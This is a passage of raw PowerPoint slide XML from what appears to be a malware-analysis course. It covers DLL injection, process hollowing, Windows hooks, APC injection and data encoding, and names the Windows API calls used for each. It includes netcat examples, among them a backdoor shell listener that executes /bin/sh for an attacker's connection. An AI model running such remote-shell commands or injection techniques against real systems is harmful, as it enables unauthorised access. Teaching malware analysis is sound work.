              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Aphex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C:\&gt; inject.exe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winlogon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“myrootkit.dll”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13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netcat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computer 1, execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>"echo hello" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and redirect output to local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server on 8888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Connect to computer 1 at 8888 and redirect output to file foo.txt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719360" y="2741216"/>
            <a:ext cx="4864320" cy="34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victim$ echo hello |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–l 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8888</a:t>
            </a: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2161" y="4427632"/>
            <a:ext cx="5611680" cy="121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attacker$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victim 8888 &gt;foo.txt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attacker$ cat foo.txt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hello</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30235491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DLL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Method #2 using Windows Debug API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker must have Debug programs rights on system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attach debugger to process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Break when you want to inject</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Analyze PE header to find a usable, writable part of memory for code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3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ReadProcessMemory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> to save code that is there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3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WriteProcessMemory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> to write injection code that loads a DLL into memory space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Include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 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> at end of injection code for debugger to stop </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Set EIP to start of injection code and continue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Breaks when DLL loaded, restore original state of memory (i.e. remove code to inject DLL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Even easier with a code cave (no need to save memory)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91046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058081" y="6231535"/>
            <a:ext cx="1608480" cy="42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spcBef>
                <a:spcPts val="680"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" b="1" i="1">
                <a:latin typeface="Verdana" pitchFamily="32" charset="0"/>
              </a:rPr>
              <a:t>Communications Technology Lab</a:t>
            </a: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0480" y="1225569"/>
            <a:ext cx="7581600" cy="441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2050561" y="2910546"/>
            <a:ext cx="793440" cy="1310538"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="800000">
              <a:alpha val="0"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="507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2793600" y="3850964"/>
            <a:ext cx="675360" cy="1441"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5076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446842" y="3669505"/>
            <a:ext cx="1158799" cy="316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2452" rIns="81639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US" altLang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="32" charset="0"/>
              </a:rPr>
              <a:t>Code cave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cave </a:t>
            </a:r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19443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code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Similar to DLL injection, but write all code into victim process directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>No DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Requires custom code that will not disrupt victim process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Often used to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a: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Mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Allocate space for new thread’s data and code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Write data and code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Create new thread pointing to injected code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VirtualAllocEx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WriteProcessMemory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>,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CreateRemoteThread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924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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Process replacement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Overwrite memory space of running process with malicious executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Also known as process hollowing, memory-only implants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Allows for almost “file-less” persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Disguise malware without risking crashes from partial injection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325703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svchost.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>In assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Start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svchost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> in suspended state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Pass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CREATE_SUSPENDED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> as the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dwCreationFlags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> parameter when calling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CreateProcess</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Listing 12-2, p. 258, Loc. 6460</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>In C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Release all memory using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ZwUnmapViewOfSection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dirty="0" smtClean="0"/>
              <a:t>Allocate memory for malicious code via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VirtualAllocEx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WriteProcessMemory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> to write malware sections</a:t>
            </a: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SetThreadContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> to fix entry point to point to malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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ResumeThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> to initiate malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Bypasses firewalls and intrusion prevention systems since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svchost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> runs many network daemons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Listing 12-3, p. 258, Loc. 6479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25703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 smtClean="0"/>
              <a:t>Kovter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> (2016)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Click-fraud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> whose code is now used for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Delivered via phishing e-mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Malicious JavaScript that hides across several registry keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Payload adds itself to startup process and performs process hollowing on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regsvr32.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="32570363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 Hook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Interpose malware using Windows hooks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Hooks used to handle messages and events going to/from applications and operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Figure 12-3, p. 259, Loc. 6502</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use malicious hooks to run certain code whenever a particular message is intercepted (i.e. keystrokes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use malicious hooks to ensure a particular DLL is loaded in a victim's memory space (i.e. process loaded event)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Types of hooks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Local hooks: observe and manipulate messages internally within process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Remote hooks: observe and manipulate messages destined for a remote process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236919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examples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Keyboard hooks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Registering hook code using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WH_KEYBOARD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> or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WH_KEYBOARD_LL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> hook procedure types to implement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>keyloggers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Windows hooks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Register hook with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SetWindowsHookEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to capture window events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Targeting threads </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Hooks must determine which thread to attach to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Malware implements code to get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dwThreadId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> of victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Hook targets often obscure to evade Intrusion Prevention Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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WH_CBT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> hook for computer-based training messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Call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SetWindowsHookEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> to install hook on remote thread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Then, initiate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WH_CBT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> message to force load</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Listing 12-4, p. 261, Loc. 6545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724946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 Detours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See previous chapter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PEView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of detour Figure 12-4, p. 262, Loc. 6580</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MigBot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detours two kernel functions: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NtDeviceIoControlFile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SeAccessCheck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Both are exported and have entries in the PE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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15022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APC injection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APC = Asynchronous Procedure Call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Malware using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CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> easily detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>APC allows for a stealthier way to execute code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Each thread has an APC function queue attached to it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Threads execute all functions in APC queue when in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>alertable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> state (i.e. swapped out)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>e.g. after calls to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WaitForSingleObjectEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/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WaitForMultipleObjectsEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, and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SleepEx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Malware performs APC injection to preempt threads in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>alertable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> state to get immediate execution of their code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Two forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Kernel-mode: APC generated for the system or a driver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>User-mode: APC generated for an application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7670627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netcat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Backdoor shell listener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Connecting to shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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96000" y="1828993"/>
            <a:ext cx="5611680" cy="266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victim$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–l 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8888 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–e /bin/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</a:t>
            </a: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attacker$ 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victim 8888</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0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406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injection from user space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One thread can queue a function to be invoked in another via API call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QueueUserAPC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WaitForSingleObjectEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is the most common call to the Windows API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Listing 12-5, p. 263-264, Loc. 6619</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> followed by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QueueUserAPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> using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LoadLibraryA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> on a malicious DLL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dbnet.dll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Note: calls to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CreateToolhelp32Snapshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> or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ZwQuerySystemInformation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Process32First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Process32Next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Thread32First</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>,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Thread32Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> usually precede this snippet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61043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APC injection from kernel space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Malicious drivers in kernel often would like to execute code in user space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Listing 12-6, p. 264, Loc. 6646</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel code to inject an APC into user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137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 12-1, 12-3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640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456481" y="596223"/>
            <a:ext cx="8226720" cy="114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13: Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoding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34313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Encoding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Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Defeat signature-detection by obfuscating malicious content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Encrypt network communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Hide command and control location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Hide staging file before transmission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Hide from “strings”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2752572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Encoding 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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1.  Simple Ciphers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2.  Common Cryptographic Algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3.  Custom Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4.  Decoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="2752572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Simple ciphers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smtClean="0"/>
              <a:t>Substituation ciphers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Shift/Rotate characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>XOR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Bit-wise XOR of data with a fixed byte or generated byte stream</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Figure 13-1, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. 271, Loc. 6762</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For a fixed byte XOR, can brute force all 256 values to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>find a PE header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(MZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(Table 13-1, Listing 13-2, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. 272-273, Loc 6795, 6825)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Can build a signature on all 256 XORs of a fixed part of file (Table 13-2, p. 273, Loc. 6839)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Some malware uses null-preserving XOR to make detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>less obvious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>0x12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>opcodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> everywhere in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Listing 13-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Then Listing </a:t>
            </a:r>
            <a:r>
